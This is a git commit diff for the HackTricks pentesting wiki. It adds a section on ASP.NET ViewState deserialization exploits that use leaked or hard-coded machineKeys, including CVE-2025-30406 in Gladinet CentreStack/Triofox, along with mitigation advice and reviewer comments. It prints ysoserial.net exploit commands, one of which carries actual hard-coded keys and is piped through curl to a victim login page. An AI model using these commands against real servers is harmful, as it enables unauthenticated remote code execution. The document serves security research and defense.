mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Add content from: Research Update: Enhanced src/pentesting-web/deserialization...
This commit is contained in:
parent
0f0e4e0900
commit
1018f5af23
@ -237,8 +237,56 @@ curl "http://victim/page.aspx?__VIEWSTATE=<PAYLOAD>"
This **key-exfiltration primitive** was mass-exploited against on-prem SharePoint servers in 2025 ("ToolShell" – CVE-2025-53770/53771), but it is applicable to any ASP.NET application where an attacker can run server-side code.
## 2024-2025 Real-world Exploitation Scenarios and Hard-coded Machine Keys
### Microsoft “publicly disclosed machine keys” wave (Dec 2024 – Feb 2025)
Microsoft Threat Intelligence reported mass exploitation of ASP.NET sites where the *machineKey* had previously been leaked on public sources (GitHub gists, blog posts, paste sites). Adversaries enumerated these keys and generated valid `__VIEWSTATE` gadgets with the newer `ysoserial.net` 1.41 `--minify` and `--islegacy` flags to evade WAF length limits:
```bash
ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" \
--validationkey=<LEAKED_VALIDATION_KEY> --validationalg=SHA1 \
--decryptionkey=<LEAKED_DECRYPTION_KEY> --decryptionalg=AES \
--generator=<VIEWSTATEGEN> --minify
```
Rotating static keys or switching to *AutoGenerate* keys in Web .config (`<machineKey ... validationKey="AutoGenerate" decryptionKey="AutoGenerate" />`) mitigates this class of attacks. {{#ref}}
{{#endref}}
### CVE-2025-30406 – Gladinet CentreStack / Triofox hard-coded keys
Kudelski Security uncovered that multiple CentreStack / Triofox releases shipped with identical `machineKey` values, enabling unauthenticated remote code execution through ViewState forgery (CVE-2025-30406).
One-liner exploit:
```bash
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \
--validationkey=ACC97055B2A494507D7D7C92DC1C854E8EA7BF4C \
--validationalg=SHA1 \
--decryptionkey=1FB1DEBB8B3B492390B2ABC63E6D1B53DC9CA2D7 \
--decryptionalg=AES --generator=24D41AAB --minify \
| curl -d "__VIEWSTATE=$(cat -)" http://victim/portal/loginpage.aspx
```
Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or replace the keys immediately. {{#ref}}
{{#endref}}
## References
- [Exploiting ViewState deserialization using Blacklist3r and YSoSerial.NET](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
- [Deep dive into .NET ViewState deserialization and its exploitation](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
- [Exploiting deserialisation in ASP.NET via ViewState (Soroush Dalili, 2019)](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
- [Introducing badsecrets – fast machineKey discovery](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
- [SharePoint “ToolShell” exploitation chain (Eye Security, 2025)](https://research.eye.security/sharepoint-under-siege/)
- [Microsoft Security – Code injection attacks abusing publicly disclosed ASP.NET machine keys (Feb 6 2025)](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/)
- [Kudelski Security advisory – Gladinet CentreStack / Triofox RCE CVE-2025-30406 (Apr 16 2025)](https://research.kudelskisecurity.com/2025/04/16/gladinet-centrestack-and-gladinet-triofox-critical-rce-cve-2025-30406/)
- [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
- [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
- [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
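Review bot: both `{{#ref}}` ... `{{#endref}}` pairs added in this hunk (the one after the AutoGenerate mitigation sentence and the one after the CentreStack fix-version sentence) are empty, so they render no link at all; put the intended target between the tags or drop them and rely on the References list. In the same region, `Web .config` should read `Web.config`, and the AutoGenerate recommendation needs a caveat: auto-generated keys are per machine, so on a web farm every node must share an explicit, identical `machineKey`, and the fix there is rotating to a freshly generated secret kept out of source control; rotating keys also invalidates outstanding ViewState and forms-authentication tickets, which is worth stating next to "rotate or replace the keys immediately". The CVE-2025-30406 section names the fixed builds but never says which releases are affected; consider adding the affected range from the Kudelski advisory already cited under References.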
@ -250,4 +298,3 @@ This **key-exfiltration primitive** was mass-exploited against on-prem SharePoin
{{#include ../../banners/hacktricks-training.md}}